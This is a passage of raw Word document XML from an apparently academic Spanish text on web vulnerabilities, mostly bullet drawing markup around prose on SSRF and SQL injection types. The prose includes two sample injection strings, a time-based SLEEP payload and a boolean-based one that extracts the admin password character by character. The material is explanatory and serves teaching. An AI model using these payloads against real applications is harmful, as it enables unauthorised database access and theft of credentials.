    <w:p w14:paraId="37762A35" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="106" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="362"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Server-Side Request Forgery (SSRF)</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: La aplicación web recupera un recurso remoto sin validar la URL proporcionada por el usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CF9EA5" w14:textId="4C5D37D9" w:rsidR="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:spacing w:after="305"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Según un informe de Veracode (2023), el 76% de las aplicaciones web contienen al menos una vulnerabilidad del OWASP Top 10, y el 24% contiene vulnerabilidades de alta severidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D53B448" w14:textId="740313B1" w:rsidR="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc196776199"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SQL INJECTION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="35176749" w14:textId="0958302D" w:rsidR="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc196776200"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DEFINICION Y MECANISMO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A5133E" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:spacing w:after="202"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SQL Injection es una técnica de ataque que aprovecha vulnerabilidades en la capa de acceso a datos de aplicaciones web. Consiste en la inserción o "inyección" de código SQL malicioso a través de los puntos de entrada de la aplicación, principalmente formularios web o parámetros URL (Clarke, 2020).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDFE5A3" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:spacing w:after="307"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cuando una aplicación web construye consultas SQL dinámicas basadas en la entrada del usuario sin una validación y sanitización adecuadas, los atacantes pueden manipular estas consultas para obtener acceso no autorizado a la base de datos o ejecutar comandos no deseados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173CD431" w14:textId="719E97FB" w:rsidR="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc196776201"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>TIPOS DE SQL INJECTION Y SUS MECANISMOS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="170D88CF" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:spacing w:after="225"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>De acuerdo con el NIST (2022), existen varios tipos de ataques de SQL Injection, cada uno con mecanismos específicos de funcionamiento:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4633C7" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:ind w:left="420" w:right="12" w:hanging="270"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="586607E5" wp14:editId="5D49C0E5">
                <wp:extent cx="57150" cy="57150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5347" name="Group 5347"/>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131" name="Shape 131"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="57150" cy="57150"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="57150" h="57150">
                                <a:moveTo>
                                  <a:pt x="28575" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="32364" y="0"/>
                                  <a:pt x="36009" y="726"/>
                                  <a:pt x="39510" y="2175"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43011" y="3625"/>
                                  <a:pt x="46101" y="5690"/>
                                  <a:pt x="48781" y="8370"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="51460" y="11049"/>
                                  <a:pt x="53525" y="14139"/>
                                  <a:pt x="54975" y="17639"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="56425" y="21140"/>
                                  <a:pt x="57150" y="24785"/>
                                  <a:pt x="57150" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="57150" y="32364"/>
                                  <a:pt x="56425" y="36007"/>
                                  <a:pt x="54975" y="39509"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="53525" y="43010"/>
                                  <a:pt x="51460" y="46100"/>
                                  <a:pt x="48781" y="48780"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46101" y="51459"/>
                                  <a:pt x="43011" y="53524"/>
                                  <a:pt x="39510" y="54973"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36009" y="56424"/>
                                  <a:pt x="32364" y="57150"/>
                                  <a:pt x="28575" y="57150"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24786" y="57150"/>
                                  <a:pt x="21141" y="56424"/>
                                  <a:pt x="17640" y="54973"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14139" y="53524"/>
                                  <a:pt x="11049" y="51459"/>
                                  <a:pt x="8369" y="48780"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5690" y="46100"/>
                                  <a:pt x="3625" y="43010"/>
                                  <a:pt x="2175" y="39509"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="725" y="36007"/>
                                  <a:pt x="0" y="32364"/>
                                  <a:pt x="0" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="24785"/>
                                  <a:pt x="725" y="21140"/>
                                  <a:pt x="2175" y="17639"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3625" y="14139"/>
                                  <a:pt x="5690" y="11049"/>
                                  <a:pt x="8369" y="8370"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11049" y="5690"/>
                                  <a:pt x="14139" y="3625"/>
                                  <a:pt x="17640" y="2175"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21141" y="726"/>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36B5C4" id="Group 5347"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">
                <v:shape id="Shape 131"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" path="m28575,v3789,,7434,726,10935,2175c43011,3625,46101,5690,48781,8370v2679,2679,4744,5769,6194,9269c56425,21140,57150,24785,57150,28575v,3789,-725,7432,-2175,10934c53525,43010,51460,46100,48781,48780v-2680,2679,-5770,4744,-9271,6193c36009,56424,32364,57150,28575,57150v-3789,,-7434,-726,-10935,-2177c14139,53524,11049,51459,8369,48780,5690,46100,3625,43010,2175,39509,725,36007,,32364,,28575,,24785,725,21140,2175,17639,3625,14139,5690,11049,8369,8370,11049,5690,14139,3625,17640,2175,21141,726,24786,,28575,xe" fillcolor="black" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,57150,57150"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inyección basada en errores</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Explota la funcionalidad del sistema para mostrar mensajes de error detallados. El atacante inserta deliberadamente consultas SQL mal formadas para provocar errores que revelen información sensible sobre la estructura de la base de datos. Por ejemplo, al insertar una comilla simple (') en un campo de formulario, el servidor podría devolver un error que muestre el tipo de base de datos, tablas afectadas o incluso fragmentos de código SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093D5D8C" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:spacing w:after="79" w:line="318" w:lineRule="auto"/>
        <w:ind w:left="415" w:right="-9" w:hanging="280"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7179EFD3" wp14:editId="6DF25B4C">
                <wp:extent cx="57150" cy="57150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5348" name="Group 5348"/>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138" name="Shape 138"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="57150" cy="57150"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="57150" h="57150">
                                <a:moveTo>
                                  <a:pt x="28575" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="32364" y="0"/>
                                  <a:pt x="36009" y="724"/>
                                  <a:pt x="39510" y="2174"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43011" y="3623"/>
                                  <a:pt x="46101" y="5688"/>
                                  <a:pt x="48781" y="8368"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="51460" y="11047"/>
                                  <a:pt x="53525" y="14137"/>
                                  <a:pt x="54975" y="17638"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="56425" y="21138"/>
                                  <a:pt x="57150" y="24785"/>
                                  <a:pt x="57150" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="57150" y="32364"/>
                                  <a:pt x="56425" y="36007"/>
                                  <a:pt x="54975" y="39508"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="53525" y="43010"/>
                                  <a:pt x="51460" y="46100"/>
                                  <a:pt x="48781" y="48780"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46101" y="51457"/>
                                  <a:pt x="43011" y="53522"/>
                                  <a:pt x="39510" y="54972"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36009" y="56423"/>
                                  <a:pt x="32364" y="57148"/>
                                  <a:pt x="28575" y="57150"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24786" y="57148"/>
                                  <a:pt x="21141" y="56423"/>
                                  <a:pt x="17640" y="54972"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14139" y="53522"/>
                                  <a:pt x="11049" y="51457"/>
                                  <a:pt x="8369" y="48780"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5690" y="46100"/>
                                  <a:pt x="3625" y="43010"/>
                                  <a:pt x="2175" y="39508"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="725" y="36007"/>
                                  <a:pt x="0" y="32364"/>
                                  <a:pt x="0" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="24785"/>
                                  <a:pt x="725" y="21138"/>
                                  <a:pt x="2175" y="17638"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3625" y="14137"/>
                                  <a:pt x="5690" y="11047"/>
                                  <a:pt x="8369" y="8368"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11049" y="5688"/>
                                  <a:pt x="14139" y="3623"/>
                                  <a:pt x="17640" y="2174"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21141" y="724"/>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866805" id="Group 5348"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">
                <v:shape id="Shape 138"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" path="m28575,v3789,,7434,724,10935,2174c43011,3623,46101,5688,48781,8368v2679,2679,4744,5769,6194,9270c56425,21138,57150,24785,57150,28575v,3789,-725,7432,-2175,10933c53525,43010,51460,46100,48781,48780v-2680,2677,-5770,4742,-9271,6192c36009,56423,32364,57148,28575,57150v-3789,-2,-7434,-727,-10935,-2178c14139,53522,11049,51457,8369,48780,5690,46100,3625,43010,2175,39508,725,36007,,32364,,28575,,24785,725,21138,2175,17638,3625,14137,5690,11047,8369,8368,11049,5688,14139,3623,17640,2174,21141,724,24786,,28575,xe" fillcolor="black" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,57150,57150"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inyección basada en tiempo</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: Utiliza comandos SQL como </w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SLEEP()</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>BENCHMARK()</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para introducir retrasos medibles en las respuestas del servidor. Si la condición inyectada es verdadera, el servidor se demorará el tiempo especificado en responder. Esto permite al atacante inferir información mediante un análisis de tiempos de respuesta, incluso cuando no hay salida visible. Por ejemplo, una consulta como </w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR (SELECT IF(substring(username,1,1)='a',SLEEP(5),0) FROM users WHERE id=1)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>causará un retraso de 5 segundos si el primer carácter del nombre de usuario es 'a'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123A67E7" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:spacing w:after="79" w:line="318" w:lineRule="auto"/>
        <w:ind w:left="415" w:right="159" w:hanging="280"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05A57750" wp14:editId="37DEDF8D">
                <wp:extent cx="57150" cy="57150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5351" name="Group 5351"/>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154" name="Shape 154"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="57150" cy="57150"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="57150" h="57150">
                                <a:moveTo>
                                  <a:pt x="28575" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="32364" y="0"/>
                                  <a:pt x="36009" y="724"/>
                                  <a:pt x="39510" y="2174"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43011" y="3625"/>
                                  <a:pt x="46101" y="5690"/>
                                  <a:pt x="48781" y="8368"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="51460" y="11047"/>
                                  <a:pt x="53525" y="14137"/>
                                  <a:pt x="54975" y="17639"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="56425" y="21138"/>
                                  <a:pt x="57150" y="24783"/>
                                  <a:pt x="57150" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="57150" y="32364"/>
                                  <a:pt x="56425" y="36009"/>
                                  <a:pt x="54975" y="39508"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="53525" y="43010"/>
                                  <a:pt x="51460" y="46100"/>
                                  <a:pt x="48781" y="48780"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46101" y="51457"/>
                                  <a:pt x="43011" y="53522"/>
                                  <a:pt x="39510" y="54973"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36009" y="56423"/>
                                  <a:pt x="32364" y="57148"/>
                                  <a:pt x="28575" y="57150"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24786" y="57148"/>
                                  <a:pt x="21141" y="56423"/>
                                  <a:pt x="17640" y="54973"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14139" y="53522"/>
                                  <a:pt x="11049" y="51457"/>
                                  <a:pt x="8369" y="48780"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5690" y="46100"/>
                                  <a:pt x="3625" y="43010"/>
                                  <a:pt x="2175" y="39508"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="725" y="36009"/>
                                  <a:pt x="0" y="32364"/>
                                  <a:pt x="0" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="24783"/>
                                  <a:pt x="725" y="21138"/>
                                  <a:pt x="2175" y="17638"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3625" y="14137"/>
                                  <a:pt x="5690" y="11047"/>
                                  <a:pt x="8369" y="8368"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11049" y="5690"/>
                                  <a:pt x="14139" y="3625"/>
                                  <a:pt x="17640" y="2174"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21141" y="724"/>
                                  <a:pt x="24786" y="0"/>
                                  <a:pt x="2857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B0107A" id="Group 5351"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">
                <v:shape id="Shape 154"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" path="m28575,v3789,,7434,724,10935,2174c43011,3625,46101,5690,48781,8368v2679,2679,4744,5769,6194,9271c56425,21138,57150,24783,57150,28575v,3789,-725,7434,-2175,10933c53525,43010,51460,46100,48781,48780v-2680,2677,-5770,4742,-9271,6193c36009,56423,32364,57148,28575,57150v-3789,-2,-7434,-727,-10935,-2177c14139,53522,11049,51457,8369,48780,5690,46100,3625,43010,2175,39508,725,36009,,32364,,28575,,24783,725,21138,2175,17638,3625,14137,5690,11047,8369,8368,11049,5690,14139,3625,17640,2174,21141,724,24786,,28575,xe" fillcolor="black" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,57150,57150"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inyección basada en booleanos</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: Modifica la cláusula WHERE de una consulta para realizar preguntas binarias (verdadero/falso) a la base de datos. El atacante observa cambios en la respuesta de la aplicación para determinar si la condición inyectada es verdadera o falsa. Este método permite extraer información carácter por carácter. Por ejemplo, inyectando </w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>' OR (ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) &gt; 90)-- -</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> permite determinar si el primer carácter de la contraseña tiene un valor ASCII mayor que 90.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B0CA8E" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:ind w:left="420" w:right="12" w:hanging="270"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C32F37E" wp14:editId="49B42FB8">
                <wp:extent cx="57150" cy="57150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5353" name="Group 5353"/>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189" name="Shape 189"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="57150" cy="57150"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="57150" h="57150">
                                <a:moveTo>
                                  <a:pt x="28575" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="32364" y="0"/>
                                  <a:pt x="36009" y="724"/>
                                  <a:pt x="39510" y="2174"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43011" y="3623"/>
                                  <a:pt x="46101" y="5688"/>
                                  <a:pt x="48781" y="8368"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="51460" y="11046"/>
                                  <a:pt x="53525" y="14137"/>
                                  <a:pt x="54975" y="17638"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="56425" y="21138"/>
                                  <a:pt x="57150" y="24785"/>
                                  <a:pt x="57150" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="57150" y="32362"/>
                                  <a:pt x="56425" y="36006"/>
                                  <a:pt x="54975" y="39508"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="53525" y="43008"/>
                                  <a:pt x="51460" y="46100"/>
                                  <a:pt x="48781" y="48780"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46101" y="51459"/>
                                  <a:pt x="43011" y="53522"/>
                                  <a:pt x="39510" y="54972"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36009" y="56423"/>
                                  <a:pt x="32364" y="57148"/>
                                  <a:pt x="28575" y="57150"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24786" y="57148"/>
                                  <a:pt x="21141" y="56423"/>
                                  <a:pt x="17640" y="54972"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14139" y="53522"/>
                                  <a:pt x="11049" y="51459"/>
                                  <a:pt x="8369" y="48780"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5690" y="46100"/>
                                  <a:pt x="3625" y="43010"/>
                                  <a:pt x="2175" y="39508"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="725" y="36007"/>
                                  <a:pt x="0" y="32362"/>
                                  <a:pt x="0" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="24785"/>
                                  <a:pt x="725" y="21138"/>
                                  <a:pt x="2175" y="17638"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3625" y="14137"/>
                                  <a:pt x="5690" y="11046"/>
                                  <a:pt x="8369" y="8368"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11049" y="5688"/>
                                  <a:pt x="14139" y="3623"/>
                                  <a:pt x="17640" y="2174"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21141" y="724"/>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5E8BB0" id="Group 5353"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">
                <v:shape id="Shape 189"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" path="m28575,v3789,,7434,724,10935,2174c43011,3623,46101,5688,48781,8368v2679,2678,4744,5769,6194,9270c56425,21138,57150,24785,57150,28575v,3787,-725,7431,-2175,10933c53525,43008,51460,46100,48781,48780v-2680,2679,-5770,4742,-9271,6192c36009,56423,32364,57148,28575,57150v-3789,-2,-7434,-727,-10935,-2178c14139,53522,11049,51459,8369,48780,5690,46100,3625,43010,2175,39508,725,36007,,32362,,28575,,24785,725,21138,2175,17638,3625,14137,5690,11046,8369,8368,11049,5688,14139,3623,17640,2174,21141,724,24786,,28575,xe" fillcolor="black" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
